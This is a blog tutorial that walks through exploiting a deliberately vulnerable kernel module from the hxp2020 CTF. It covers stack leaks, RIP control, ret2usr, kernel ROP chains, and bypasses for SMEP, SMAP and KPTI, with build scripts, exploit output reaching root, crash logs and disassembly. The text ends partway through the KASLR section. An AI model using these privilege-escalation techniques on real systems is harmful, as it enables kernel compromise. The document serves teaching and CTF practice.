Introduction To Linux Kernel Exploitation Exploiting Buffer Overflows in Vulnerable Kernel Modules
Prelude
This blog post documents my forays into Linux kernel exploitation.
The basis for this introduction is a challenge from the hxp2020 CTF called kernel-rop
.
If you want to follow along, you can either download it from the CTF page or from a local mirror.
There are already a lot of solutions to this challenge on the internet. If you came to my blog by looking for such a solution, you may be disappointed. This article is rather about Linux kernel exploitation in general and uses the challenge only as an example. The reason why I chose especially that challenge is that it seemed to be a good entrance to kernel exploitation.
At the end of this article you will know how common security mitigations in the kernel work and how to circumvent them. We are using qemu as emulator for the kernel and are writing an exploit for a custom kernel module. This setup is pretty common and the bug is easy to spot.
I used drafts of this blog post (and exercises derived thereof) to teach a workshop about linux kernel exploitation at my current company. I want to thank my colleagues for their valuable feedback which resulted in me rewriting some parts of this blog post, and also in enough pressure, to finally finish this post.
Setup
First, we unpack the .tar.gz from the CTF and take a look at the relevant files.
vmlinuz
- This contains the actual Linux kernel image.initramfs.cpio.gz
- this contains the initial ramdisk. This is the filesystem that was compressed using cpio and gzip.run.sh
- This file contains the qemu command to run the vm.
What follows is a more in-depth view of the various files.
vmlinuz
This is the Linux kernel image. We can find out the version using file
.
$ file vmlinuz
vmlinuz: Linux kernel x86 boot executable bzImage, version 5.9.0-rc6+ (martin@martin) #10 SMP Sun Nov 22 16:47:32 CET 2020, RO-rootFS, swap_dev 0X7, Normal VGA
The terminology here is that the z at the end indicates that it is
compressed. This is usually done with gzip, bzip or lzma. The
decompressed image is then called vmlinux
.
Decompression can be performed using a script from the linux
kernel
that is also locally mirrored here.
initramfs.cpio.gz
This is the initial ramdisk. It is gzipped and cpioed. gzip is a compression algorithm and should be known. cpio is an archival algorithm like tar. I encountered it back in the days when I was working as Linux sysadmin. It is a historic format, but is still used here.
We can unpack this using cat initramfs.cpio.gz | gunzip | cpio
--extract
. Probably we have to do this multiple times, so I found the following script.
#!/bin/bash
mkdir initramfs
pushd . && pushd initramfs
cp ../initramfs.cpio.gz .
cat initramfs.cpio.gz | gunzip | cpio -i && rm initramfs.cpio
popd
The content of the file system is shown in the following.
$ tree
.
├── bin
│ ├── busybox
│ └── sh -> busybox
├── etc
│ ├── init.d
│ │ └── rcS
│ ├── inittab
│ ├── motd
│ └── resolv.conf -> /proc/net/pnp
├── hackme.ko
├── init -> bin/busybox
├── root
├── sbin
└── usr
├── bin
└── sbin
This is a Linux file system. motd contains a fun banner. hackme.ko is a kernel module that is vulnerable and needs to be hacked.
The file /etc/init.d/rcS
contains the following important parts.
....
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
chmod 400 /proc/kallsyms
insmod /hackme.ko
chmod 666 /dev/hackme
The command echo 1 > /proc/sys/kernel/kptr_restrict
obscures the
kernel pointers that are exposed via /proc
and other
interfaces. Basically it means that kernel pointers are “usually”
replaced by zeroes.
The command echo 1 > /proc/sys/kernel/dmesg_restrict
restricts
unprivileged users from issuing dmesg
to view the kernel log. We
could set this to 0
to ease debugging.
The next line chmod 400 /proc/kallsyms
sets restrictions to the file
/proc/kallsyms
. This file contains the kernel symbols and thus
read access could be used to get valid pointers to the kernel address space.
Next, the vulnerable kernel module is loaded into the kernel using
insmod /hackme.ko
.
The command chmod 666 /dev/hackme
sets the permissions on the device
/dev/hackme
. This is probably a device that serves as an interface
to the vulnerable kernel module hackme.ko
. Hence, the goal of the
challenge is probably to read and write to that device and pwn the
kernel in this way.
The file /etc/inittab
contains the command setuidgid 1000 sh;
This
gives us a shell for the normal user. We can modify this to setuidgid
0 sh
in order to get a root shell. If we boot the modified initramfs,
we can then access files that are helpful in debugging the exploit
such as /proc/kallsyms
that contains the symbols of the kernel or
/sys/module/core/sections/.text
that contains the address of the
.text
section of the kernel.
We will have to compile an exploit, include it in initramfs, compress initramfs and then run the kernel. Then we have to test the exploit and if it does not work, do all the steps again. So here is a script to automate compilation, inclusion in initramfs and compressing initramfs. This script was found here.
#!/bin/bash
# Compress initramfs with the included statically linked exploit
in=$1
out=$(echo $in | awk '{ print substr( $0, 1, length($0)-2 ) }')
gcc $in -static -o $out || exit 255
mv $out initramfs
pushd . && pushd initramfs
find . -print0 | cpio --null --format=newc -o 2>/dev/null | gzip -9 > ../initramfs.cpio.gz
popd
run.sh
This script runs the kernel and the initramfs within qemu. Its commented content is as follows.
#!/bin/sh
qemu-system-x86_64 \
-m 128M \ # the memory size
-cpu kvm64,+smep,+smap \ # cpu model and enabling some mitigations
-kernel vmlinuz \ # the kernel image
-initrd initramfs.cpio.gz \ # the initial ramdisk
-hdb flag.txt \ # use this file as harddisk image /dev/hdb
-snapshot \ # write to temporary files and not disk images
-nographic \ # disable graphical output. only command line
-monitor /dev/null \ # redirect the monitor
-no-reboot \ # exit instead of rebooting
-append "console=ttyS0 kaslr kpti=1 quiet panic=1"
# this last line specifies some boot options
As some of these arguments enable Kernel security mitigations, it is a natural next step in this exposition. Note that we can modify the mitigations within this command in order to have an easier time exploiting the kernel module.
But first a digression regarding remote debugging. If we append -s
to the list of arguments, then qemu enables remote debugging on port
1234.
We can connect to this port using the gdb debugger with the command
target remote localhost:1234
.
If we add -S
to the list of arguments of qemu, then the kernel is
started in a suspended state. Within gdb, we can attach to this and
start the kernel using continue
or simply c
. This allows debugging
the kernel. This information is just for the sake of completeness.
We do not make use of remote debugging in the remainder of this
article.
Kernel Security Mitigations
As the run.sh
script contained options that enable Kernel security
mechanisms, we will next talk about these.
Kernel ASLR (Address Space Layout Randomization)
- This is similar to ASLR in the user space. The objects in the kernel are loaded at random addresses in order to prevent using known offsets to jump to known function pointers.SMEP (Supervisor Mode Execution Prevention)
- All userland memory pages in the kernel are marked as non-executable when a process is in kernel mode. This prevents using code from user space in kernel exploits. If we want to have arbitrary code execution in the kernel, we need to reuse code that is already inside the kernel (i.e., using a ROP-chain with gadgets in the kernel). SMEP is enabled by setting the20th bit of the CR4 control register
of the processor.SMAP (Supervisor Mode Access Prevention)
- Similar to SMAP. It marks all userland memory pages as non-readable and non-writable when execution is in kernel land. While the other mitigations are common to Windows and Linux, SMAP is not implemented in Windows. Like SMAP, SMEP is enabled by setting the21st bit of the CR4 control register
of the processor.KPTI (Kernel Page Table Isolation)
- This is a further enhancement of SMEP/SMAP. User land and kernel land memory tables are isolated. One set of memory pages tables is used for running in kernel mode. This contains both user mode and kernel mode pages. A second set of memory page tables is used when running in user mode. It contains the full user land pages and a minimal needed set of kernel mode memory pages.
Reconnaissance
After we have our setup, a natural next step is looking at the
vulnerability that we are going to exploit. We already know that it is
residing within the hackme.ko
kernel module. Hence, let us take a
look at its properties.
$ rabin2 -I hackme.ko
arch x86
baddr 0x8000000
binsz 317877
bintype elf
bits 64
canary true
injprot false
class ELF64
compiler GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
crypto false
endian little
havecode true
laddr 0x0
lang c
linenum true
lsyms true
machine AMD x86-64 architecture
nx false
os linux
pic false
relocs true
relro no
rpath NONE
sanitize false
static true
stripped false
subsys linux
va true
We can see that stack canaries are enabled in the kernel module. This is a mitigation against exploitation of buffer overflows. A fake value is inserted in the stack and when a function returns, the canary is checked for modifications. Modification corresponds to the detection of an exploit attempt and the kernel crashes the program.
Disassembling the kernel module, e.g., using Ghidra or r2 reveals multiple functions.
$ r2 -A initramfs/hackme.ko
...
-- Remember to maintain your ~/.radare_history
[0x08000064]> afl
0x08000070 1 13 sym.hackme_release
0x08000080 8 174 sym.hackme_write
0x08000140 1 13 sym.hackme_open
0x08000150 5 174 sym.hackme_read
0x08000207 1 23 sym.hackme_init
0x0800021e 1 18 sym.hackme_exit
The functions hackme_init
, hackme_exit
, hackme_open
, and
hackme_release` are necessary for a kernel module. They are
needed for loading and unloading the kernel module.
The function hackme_read
is executed, when we read from
/dev/hackme
.
The function hackme_write
is executed, when we write to
/dev/hackme
.
Decompiling hackme_read
using again Ghidra or r2 reveals the
following.
There is a 32-byte array on the stack tmp[32]
, but we can read
up to 0x1000=4096
bytes. Thus, it allows to read further and hence
leak the stack.
The function hackme_write
is very similar. It allows to write up to
0x1000
bytes into a 32-byte array on the stack. Hence it allows to
overflow the stack.
Leaking the Stack
As we can leak the stack using ``hackme_read`, we can also read the stack canary token. Our code is based on this awesome writeup.
We prepare a file called leak_stack.c
. This can be compiled and
packed in the initramfs using the script shown above in the setup
paragraph.
Then, we can execute run.sh
to start the kernel and drop into a
shell within the qemu environment. If we included the compiled
leak_stack.c
correctly, we should find it in the root folder.
Its output looks as follows.
$ ./leak_stack
[+] successfully opened /dev/hackme
[*] trying to leak up to 320 bytes memory
[+] offset 0 contains value: 0xffffffffa773a630
[+] offset 1 contains value: 0x2a
[+] offset 2 contains value: 0x3d8f236e8e010100
[+] offset 3 contains value: 0xffff946086cae110
[+] offset 4 contains value: 0xffffad8e801bfe68
[+] offset 5 contains value: 0x4
[+] offset 6 contains value: 0xffff946086cae100
[+] offset 7 contains value: 0xffffad8e801bfef0
[+] offset 8 contains value: 0xffff946086cae100
[+] offset 9 contains value: 0xffffad8e801bfe80
[+] offset 10 contains value: 0xffffffffa728ab57
[+] offset 11 contains value: 0xffffffffa728ab57
[+] offset 12 contains value: 0xffff946086cae100
[+] offset 13 contains value: 0x0
[+] offset 14 contains value: 0x7ffe54601790
[+] offset 15 contains value: 0xffffad8e801bfea0
[+] offset 16 contains value: 0x3d8f236e8e010100
[+] offset 17 contains value: 0x140
[+] offset 18 contains value: 0x0
[+] offset 19 contains value: 0xffffad8e801bfed8
[+] offset 20 contains value: 0xffffffffa728565f
[+] offset 21 contains value: 0xffff946086cae100
[+] offset 22 contains value: 0xffff946086cae100
[+] offset 23 contains value: 0x7ffe54601790
[+] offset 24 contains value: 0x140
[+] offset 25 contains value: 0x0
[+] offset 26 contains value: 0xffffad8e801bff20
[+] offset 27 contains value: 0xffffffffa75a6507
[+] offset 28 contains value: 0xffffffffa7871d81
[+] offset 29 contains value: 0x0
[+] offset 30 contains value: 0x3d8f236e8e010100
[+] offset 31 contains value: 0xffffad8e801bff58
[+] offset 32 contains value: 0x0
[+] offset 33 contains value: 0x0
[+] offset 34 contains value: 0x0
[+] offset 35 contains value: 0xffffad8e801bff30
[+] offset 36 contains value: 0xffffffffa776330a
[+] offset 37 contains value: 0xffffad8e801bff48
[+] offset 38 contains value: 0xffffffffa6e0a157
When looking at the stack, we can see three types of entities. There
are arguments to functions at offset 1 and 5. Then, there are
addresses starting with 0xffff. Thirdly, there are stack canaries.
such as the one at offset 2, 16, or 30. Apparently, the one at offset
2 is a part of the uninitialized memory from the variable tmp[32]
and
not a canary, even though it looks like one.
This tutorial
computes the offset of the stack canary simply through reverse
engineering.
This
tutorial
detects the stack canary automatically by assuming that it does not
start with ffff
and ends in 00
.
Controlling RIP
As a next step, we want to check if we can control the instruction
pointer RIP.
As mentioned above, we can overwrite the stack using the function
hackme_write
. When this function is done, the stack is unwound.
This means, that the previous stack context has to be recovered.
RBX and RBP are so-called callee-saved registers. Hence, they have to be
restored from the stack. Further, R12 is popped. I don’t know what R12 is good for, or why that happens, but this is the way things are.
Finally, the instruction pointer RIP is popped.
So we can construct a payload and write it to /dev/hackme
.
Again, we need to compile, compress the exploit into initramfs and start it with qemu using run.sh.
$ ./control_rip
[+] successfully opened /dev/hackme
[*] trying to leak up to 320 bytes memory
[+] leaked cookie 0xa19c496548ccde00 at offset 16
[ 4.268641] general protection fault: 0000 [#1] SMP PTI
[ 4.269235] CPU: 0 PID: 113 Comm: control_rip Tainted: G O 5.9.0-rc6+ #10
[ 4.269605] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-1.fc39 04/01/2014
[ 4.270271] RIP: 0010:0x4141414141414141
[ 4.270653] Code: Bad RIP value.
[ 4.271015] RSP: 0018:ffffa2d5c01bfeb0 EFLAGS: 00000296
[ 4.271432] RAX: 0000000000000140 RBX: 4444444444444444 RCX: 0000000000000000
[ 4.271753] RDX: 00000000ffffffff RSI: ffffffffc00dc580 RDI: ffffa2d5c01bff48
[ 4.272099] RBP: 4242424242424242 R08: ffffffff9c46af7a R09: ffffa2d5c01bff48
[ 4.272388] R10: ffffffff9bc0a157 R11: 0000000000000000 R12: 4343434343434343
[ 4.272926] R13: ffffa2d5c01bfef0 R14: 00007ffd3d05bd10 R15: ffff8c27c6caef00
[ 4.273360] FS: 000000000226f380(0000) GS:ffff8c27c7a00000(0000) knlGS:0000000000000000
[ 4.273834] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 4.274157] CR2: 4141414141414141 CR3: 000000000652c000 CR4: 00000000003006f0
[ 4.274665] Call Trace:
[ 4.275780] ? ksys_read+0xa7/0xe0
[ 4.275933] ? exit_to_user_mode_prepare+0x31/0x180
[ 4.276170] ? __x64_sys_read+0x1a/0x20
[ 4.276376] ? do_syscall_64+0x37/0x80
[ 4.276564] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 4.276865] Modules linked in: hackme(O)
[ 4.277795] ---[ end trace 348a615b394120d4 ]---
[ 4.278031] RIP: 0010:0x4141414141414141
[ 4.278271] Code: Bad RIP value.
[ 4.278463] RSP: 0018:ffffa2d5c01bfeb0 EFLAGS: 00000296
[ 4.278747] RAX: 0000000000000140 RBX: 4444444444444444 RCX: 0000000000000000
[ 4.278999] RDX: 00000000ffffffff RSI: ffffffffc00dc580 RDI: ffffa2d5c01bff48
[ 4.279286] RBP: 4242424242424242 R08: ffffffff9c46af7a R09: ffffa2d5c01bff48
[ 4.279604] R10: ffffffff9bc0a157 R11: 0000000000000000 R12: 4343434343434343
[ 4.279952] R13: ffffa2d5c01bfef0 R14: 00007ffd3d05bd10 R15: ffff8c27c6caef00
[ 4.280318] FS: 000000000226f380(0000) GS:ffff8c27c7a00000(0000) knlGS:0000000000000000
[ 4.280804] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 4.281200] CR2: 4141414141414141 CR3: 000000000652c000 CR4: 00000000003006f0
Segmentation fault
...
We can clearly see that we control the return address RIP, as it
contains 0x4141414141414141
. This is so far with all mitigations still
enabled.
However, as we are in kernel mode it is not immediately clear how to
exploit this fact.
Privilege Escalation Without Any Mitigations: Ret2Usr
In order to make out life easier, let us first disable the security mechanisms and try to exploit it. We can later add the security mechanisms again and built up to the full challenge.
Within run.sh instead of the last line -append "console=ttyS0 kaslr
kpti=1 quiet panic=1"
we write -append "console=ttyS0 nosmep nosmap
nopti nokaslr quiet panic=1"
in order to disable SMEP/SMAP, as well
as KASLR and KPTI.
Now, we only have the stack canary to take care of. This is similar to userland exploitation with ROP chains. In userland, the goal is usually to spawn an elevated shell. In the kernel, it is the same.
There are two functions in the kernel, that are usually used for elevating privileges.
prepare_kernel_cred()
- This kernel function prepares a set of credentials for a kernel service and can also override the credentials of a task for delegation purposes. If we call this with0
as argument, the returned credentials have no group and full capabilities.commit_creds()
- This kernel function installs new credentials in the current thread.
Hence, the goal is to call commit_creds(prepare_kernel_cred(0))
using a ROP chain.
We can find the addresses of these functions inside the kernel by
checking /proc/kallsyms
. For this we modify /etc/inittab
in the
initramfs to contain setuidgid 0 sh
. This will drop us to a root
shell, so we are allowed to read /proc/kallsyms
. Don’t forget to
undo these changes, or you will wonder later why your privilege
escalation always works without doing anything.
# id
uid=0 gid=0 groups=0
# cat /proc/kallsyms | grep -e prepare_kernel_cred -e commit_creds
ffff ffff 814c6410 T commit_creds
ffff ffff 814c67f0 T prepare_kernel_cred
So we have the addresses that we need to put on the ROP chain.
After elevating our privileges, we need to go back to user land.
For this we need the assembly instruction swapgs
with either iretq
or sysretq
.
swapgs
- GS is one of the segment registers, such asCS
(Code Segment),DS
(Data Segment), orSS
(Stack Segment). These registers point to the respective sections in the binary. TheCS
register points to the code segment in the binary, i.e.,.text
. TheDS
register points to the data segment.data
in the binary and so on. When a context switch from user mode to kernel mode or back takes place, these registers just need to point to different memory addresses in order to facilitate this change.FS
andGS
are special registers in the CPU that can also be used for this context switch but whose purpose is not specified by the CPU manufacturer and thus can be chosen by the programmers of the operating system.FS
andGS
are used by Linux and Windows to access thread specific storage. As an example, in Windows, the Thread Environment Block (TEB) can be found at a fixed offset fromGS
orFS
, depending on if the architecture is 32 or 64 bit. To make a long story short, we must swap the GS register when entering user mode from kernel mode or vice versa.iretq/sysretq
- Either of these functions need to be used to perform the actual context switch between kernel and user mode.iretq
is easier to use, as it only requires the stack to be setup up with five registers for the userland in the orderRIP
,CS
,RFLAGS
,SP
,SS
. Forsysretq
we need to move the return address that should be inRIP
inRCX
. Further,sysretq
movesRFLAGS
toR11
. The bits 48 to 63 of the registerRIP
need to be the same as bit- Otherwise, we get a general protection fault.
Executing these two instructions can be performed in our exploit code using inline assembly. We do not even need a ROP chain for that, as we have disabled SMEP/SMAP and thus can craft our chain inside user mode.
Note that when we revert back to user mode with iretq/sysretq
we need
to set the registers. Hence, before doing this dance, we have to store
the userland registers in order to be able to revert them later.
This can be done as follows.
Now we can put everything together. The following code is the full exploit for a kernel without any mitigations except stack canaries.
Executing this code looks as follows.
$ ./no_mitigations
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie 0x2aa741ea8a7daa00 at offset 16
[+] we are root (uid = 0)
/ # id
uid=0 gid=0
As we see the message [+] we are root (uid = 0)
in the output of our
exploit, the elevation of privileges worked.
Note that in the payload we could instead of
execl("/bin/sh", "sh", NULL);
also write
system("/bin/sh");
. This solution can be found in different
writeups, but in my tests, it did not work and lead to a segmentation
fault. I have no idea why this does not work.
If you read this and know why it happens, please let me know. I will
edit this section when i find it out.
Adding SMEP/SMAP
Next, we will add the mitigations SMEP/SMAP and again try to exploit the kernel module. Remember that SMEP/SMAP stands for Supervisor Mode Access/Execution Prevention and marks memory pages from userland as non-accessible/executable, as long as we are in kernel mode. Hence, our exploit will not work anymore, as the inline assembly we wrote lives in user space, but we execute it from kernel mode. SMAP marks these pages as non-executable.
To enable SMEP/SMAP, we modify the last line of the original run.sh
as follows: -append "console=ttyS0 nopti nokaslr quiet panic=1"
.
Running the previous exploit yields an error message.
$ ./no_mitigations
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie 0xaeab3cc4e3107a00 at offset 16
[ 4.726632] unable to execute userspace code (SMEP?) (uid: 1000)
[ 4.727729] BUG: unable to handle page fault for address: 00000000004019bf
[ 4.728668] #PF: supervisor instruction fetch in kernel mode
[ 4.729483] #PF: error_code(0x0011) - permissions violation
[ 4.730694] PGD 6119067 P4D 6119067 PUD 6118067 PMD 6163067 PTE 7919025
[ 4.732670] Oops: 0011 [#1] SMP NOPTI
[ 4.733963] CPU: 0 PID: 113 Comm: no_mitigations Tainted: G O 5.9.0-rc6+ #10
[ 4.734799] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-1.fc39 04/01/2014
[ 4.736732] RIP: 0010:0x4019bf
[ 4.737208] Code: Bad RIP value.
...
The important part is [4.726632] unable to execute userspace code
(SMEP?) (uid: 1000)
.
Well, we are doing kernel exploitation. The error messages are not
getting any clearer than this.
In previous kernel versions up to around 2019 it was possible to disable SMEP/SMAP
by using the kernel function native_write_cr4()
. As SMEP and SMAP
are activated by setting the 20th and 21st bit in the CR4 control
register of the processor, it was possible to set those bits to zero
and hence disable SMEP/SMAP. However, this was patched by pinning the
bits so they cannot be changed anymore. Hence, this game plan does not
work anymore.
Instead, we will craft a ROP chain using gadgets from the kernel
only. This ROP chain will perform
commit_creds(prepare_kernel_cred(0))
, swapgs
, and iretq
.
First we create a list of all gadget inside the
kernel. Extract vmlinuz to vmlinux, as explained in the setup
instructions above.
There are multiple tools that can be used to extract ROP gadgets from vmlinux.
ROPGadget
(pip install ROPGadget
) can be used with the command ROPgadget --binary vmlinux > gadgets.txt
to find the
gadgets. However, it does not seem to find gadgets containing iretq
.
There is also ropr (cargo install ropr
) that is invoked using ropr --nouniq vmlinux > gadgets.txt
We can also filter gadgets using, e.g., ropr --nouniq -R '^iretq' vmlinux
Note that some of the gadgets that are found do not work as they are in memory that is marked as non-executable.
All that is left is creating a fake stack with the functions that we
want to have executed. We then write to the device hackme.ko
and
overwrite the real stack with our fake stack. When the stack is
unwound, our functions are executed.
Note that in the x64 calling convention, the arguments to functions
are given in registers. The register RDI contains the first argument
of a function. Hence, we write the value 0 in RDI and then call
prepare_kernel_cred
. The result is then returned in the register
RAX, again according to the x64 calling convention.
Alternative way of bypassing SMEP but not SMAP
You may have noticed, that we bypassed both SMEP and SMAP. By building the ROP chain only from kernel gadgets, we did not need to either execute or access memory pages from user mode. But there are alternative approaches that can bypass SMEP, but not SMAP, one of which I want to touch on here. The idea is to pivot the stack to a location where we can write our ROP chain to. This is useful in the case where we can overwrite only the return address but not further.
There are a bunch of ROP gadgets that move a constant value into ESP. One such gadget is as follows.
One could use this gadget as the return address when overflowing the buffer of the vulnerable device. Before, one needs to write the remainder of the ROP chain to the address that is moved to ESP. This can be achieved by allocating the region using mmap.
The idea works if SMEP is enabled, as we do not need to execute anything in userland. However, it does not work when SMAP is enabled, as we need read and write access to the location where we pivot to, i.e., to a user land memory page.
I saw this idea in this other writeup.
We need to modify run.sh
to disable SMAP and enable SMEP using the command line arguments -cpu kvm64,+smep
.
The full code for the exploit is shown below.
Adding KPTI
Next, we will add Kernel page-table isolation (KPTI).
For this we edit run.sh
to include -append "console=ttyS0 kpti=1
nokaslr quiet panic=1"
.
KPTI is a mechanism to isolate kernel page tables from user space. In user space only the necessary page tables from the kernel are mapped that allow to switch to kernel mode.
Thus, if we execute the previous exploit, we get a segmentation fault, instead of a kernel panic. This happens, as the system tries to access pages from the kernel while in user mode that are not mapped anymore.
The following ASCII art illustrates the results of KPTI.
Without KPTI With KPTI
+----------------+ +----------------+ +----------------+
| | | | | |
| Kernel pages | | Kernel pages | | |
| | | | +----------------+
| | | | | Kernel pages |
+----------------+ +----------------+ +----------------+
| | | | | |
| | | | | |
| | ---------> | | | |
| | | | | |
| User pages | | User pages | | User pages |
| | | | | |
| | | | | |
| | | | | |
| | | | | |
| | | | | |
| | | | | |
+----------------+ +----------------+ +----------------+
User + Kernel Kernel mode User mode
mode
I have read about three ways to bypass KPTI
- Using a signal handler: Here, a signal handler for the segmentation fault is registered that will execute the payload with root privileges.
- KPTI Trampolines: The kernel needs to contain a functionality
for changing from kernel mode to user mode. This function called a
KPTI trampoline is still mapped in memory, even when we are in user
mode and hence can be used to return to the user space, without our
hacky
swapgs
andiretq
gadgets. - Abusing modprobe: The kernel has a reference to the path of the binary
modprobe
. Under some circumstances, the variable at this path is executed. If the path is overwritten, and the circumstances are achieved, then the file at the path is executed. This execution happens with kernel privileges.
KPTI Bypass 1: Using a Signal Handler
This is probably the easiest way to circumvent KPTI.
Remember that if we execute the previous exploit, we get a
segmentation fault. We can register a signal handler that handles the
segmentation fault and executes the payload.
The segmentation fault occurs after the elevation of privileges, when
the switch back to user mode with iretq
is performed. Hence, we only
need to prevent the process from crashing.
Instead of executing the payload, the registered function to handle
the segmentation fault could simply do nothing.
Adding a signal handler can be performed by including the line
signal(SIGSEGV, payload);
within the main
function. Further, we
need to include the respective headers using #include <signal.h>
.
These are really the only changes that need to be made. But for the sake of completeness here is the full code.
KPTI Bypass 2: KPTI Trampolines
This is the idea that you can find in most writeups on bypassing
KPTI. The main idea is that if a syscall returns normally, then there
is a piece of code that achieves this.
This code is called a KPTI trampoline and changes the memory page
tables from kernel space to user space.
It will swap the page tables and then execute swapgs
and iretq
,
just like we did manually.
In Linux this function is called
swapgs_restore_regs_and_return_to_usermode
, and we can find its
position by looking for it in the kallsyms. Note that we need
administrative privileges for that.
# cat /proc/kallsyms | grep swapgs_restore_regs_and_return_to_usermode
ffffffff81200f10 T swapgs_restore_regs_and_return_to_usermode
Disassembling this function with radare2 can be done as shown below.
$ r2 -A vmlinux
...
[0xffffffff81e00000]> s 0xffffffff81200f10
[0xffffffff81200f10]> pdb
│ ; CODE XREF from fcn.ffffffff812010d0 @ 0xffffffff8120137e(x)
│ ; DATA XREF from fcn.ffffffff8159fce0 @ 0xffffffff8159fced(x)
│ ; DATA XREF from fcn.ffffffff815a0180 @ 0xffffffff815a01ee(x)
│ 0xffffffff81200f10 415f pop r15
│ 0xffffffff81200f12 415e pop r14
│ 0xffffffff81200f14 415d pop r13
│ 0xffffffff81200f16 415c pop r12
│ 0xffffffff81200f18 5d pop rbp
│ 0xffffffff81200f19 5b pop rbx
│ 0xffffffff81200f1a 415b pop r11
│ 0xffffffff81200f1c 415a pop r10
│ 0xffffffff81200f1e 4159 pop r9
│ 0xffffffff81200f20 4158 pop r8
│ 0xffffffff81200f22 58 pop rax
│ 0xffffffff81200f23 59 pop rcx
│ 0xffffffff81200f24 5a pop rdx
│ 0xffffffff81200f25 5e pop rsi
│ 0xffffffff81200f26 4889e7 mov rdi, rsp
│ 0xffffffff81200f29 65488b2425.. mov rsp, qword gs:[0x6004]
│ 0xffffffff81200f32 ff7730 push qword [rdi + 0x30]
│ 0xffffffff81200f35 ff7728 push qword [rdi + 0x28]
│ 0xffffffff81200f38 ff7720 push qword [rdi + 0x20]
│ 0xffffffff81200f3b ff7718 push qword [rdi + 0x18]
│ 0xffffffff81200f3e ff7710 push qword [rdi + 0x10]
│ 0xffffffff81200f41 ff37 push qword [rdi]
│ 0xffffffff81200f43 50 push rax
│ ┌─< 0xffffffff81200f44 eb43 jmp 0xffffffff81200f89
[0xffffffff81200f41]> s 0xffffffff81200f89
[0xffffffff81200f89]> pdb
│ ; CODE XREF from fcn.ffffffff812010d0 @ 0xffffffff81200f44(x)
│ 0xffffffff81200f89 58 pop rax
│ 0xffffffff81200f8a 5f pop rdi
│ 0xffffffff81200f8b ff15f7f0e300 call qword [0xffffffff82040088] ; swapgs
│ 0xffffffff81200f91 ff25e9f0e300 jmp qword [0xffffffff82040080] ; iretq
The swapgs
and iretq
can be found in the last call and the jmp.
Apparently, this small stub is still mapped in memory, even when we are in
user mode, as it is necessary to leave the kernel. I do not exactly
know, why this cannot be removed and needs to be accessible from user
mode, but apparently that is how things are. Hence, we can use it to
bypass KPTI.
The plan is to jump to
swapgs_restore_regs_and_return_to_usermode+22
, as that is the part
where the push operations begin. Note that at the start of
0xffffffff81200f89
there are two additional pop instructions that we
have to take care of.
What is left is to exchange the swapgs
and iretq
in our ROP chain
with swapgs_restore_regs_and_return_to_usermode+22
and two dummy
arguments that will be popped to RAX and RDI.
The full code is shown below.
KPTI Bypass 3: Abuse Modprobe
The binary modprobe
is used to add or remove modules from the kernel.
Its path is stored in a global kernel variable that can be accessed in
/proc/sys/kernel/modprobe
and usually defaults to
/sbin/modprobe
. Further, a reference to this variable called
modprobe_path
can be found
in the kernel symbols accessible using /proc/kallsyms
, as it is a
kernel variable.
The game plan is to overwrite the path of modprobe with a filename of
a file containing custom commands. Overwriting modprobe_path
can be
performed using a ROP chain. The file containing the custom commands
can be created any way you like. The final execution of the file
referenced using modprobe_path
and hence our commands, can be
performed by calling execve
on a binary that has no format handler
specified.
The whole procedure is reminiscent of the fine intricacies of a theater play, albeit with actors that have strange names.
I will spare you the details and the code, but if you want to know more, you can find more information in paragraph “Version 3: Probing the mods” of this writeup.
There are also other so-called user mode helpers in addition to modprobe that
can be used in a similar way. As an example, the file
/proc/sys/kernel/core_pattern
contains the command that is used to
create coredumps. This can again be overwritten to point to an evil
binary and then a coredump can be triggered to execute the evil binary..
Adding KASLR
Next, let us add KASLR back by adding -kaslr
to run.sh
so we have -append "console=ttyS0 kpti=1 kaslr quiet panic=1"
.
Preliminaries
To understand KASLR, let us first start with Address Space Layout Randomization (ASLR).
ASLR is an exploit mitigation in user space that prevents building
reliable ROP gadgets. This was added to Linux around 2005. The main
idea is to randomize the memory space,
such that the ROP gadgets are at different addresses in different runs
and thus cannot be reliably jumped to. There are various
implementations, some only randomize the .text
section, some
also randomize the stack, heap, and libraries.
Usually, the way to bypass ASLR is to get an address leak. If only the base address of the loaded executable is randomized, then the offsets are still the same in multiple runs. Hence, from an address leak the relative offsets of the ROP gadgets can be calculated and hence, ASLR could be bypassed.
Kernel ASLR (KASLR) is basically ASLR, but in kernel mode. This was
merged to Linux around 2014 in version 3.14. Back in the days this
loaded the kernel at a random base address, but left the offsets
intact. This old version can be activated using the options kaslr
and nofgkaslr
in run.sh
.
In 2021, Function Granular KASLR (FGKASLR) was introduced which is a finer grained kernel address space randomization. In particular, the kernel code is rearranged per function. Hence, even when a kernel address leak exists, it is hard to exploit, as computing the relative offsets does not work anymore.
Reconnaissance
The introduction of KASLR breaks all our previously developed exploits, as it changes the addresses of the ROP gadgets.
There are two places where we can start our investigation.
We can leak the stack and compare how it changes between different
runs.
Or we can modify initramfs/etc/inittab
to give us a root shell so we
can read /proc/kallsyms
and compare the
addresses of the kernel symbols between multiple runs.
Investigating the Stack
We already developed leak_stack.c
above which allows us to read the
stack.
We executed this file two times and stored the output in stack1.txt
and stack2.txt
.
Comparing the two outputs using diff stack1.txt stack2.txt
yields
the following.
3c3
< [+] offset 0 contains value: 0xffffffffa53648f0
---
> [+] offset 0 contains value: 0xffffffff8f8d0280
5,7c5,7
< [+] offset 2 contains value: 0xcd9ac705e3874700
< [+] offset 3 contains value: 0xffff981606caef10
< [+] offset 4 contains value: 0xffffaa5a001bfe68
---
> [+] offset 2 contains value: 0x310671060c9fe500
> [+] offset 3 contains value: 0xffff97ae86cae610
> [+] offset 4 contains value: 0xffffa424c01bfe68
9,15c9,15
< [+] offset 6 contains value: 0xffff981606caef00
< [+] offset 7 contains value: 0xffffaa5a001bfef0
< [+] offset 8 contains value: 0xffff981606caef00
< [+] offset 9 contains value: 0xffffaa5a001bfe80
< [+] offset 10 contains value: 0xffffffffa5749a47
